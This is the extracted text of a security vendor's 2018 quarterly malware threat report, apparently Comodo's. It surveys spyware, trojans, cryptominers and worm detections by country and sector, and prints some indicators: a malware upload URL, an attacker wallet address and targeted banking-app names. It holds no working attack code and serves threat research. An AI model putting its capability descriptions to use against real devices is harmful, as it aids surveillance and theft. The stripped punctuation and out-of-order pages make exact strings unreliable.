Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
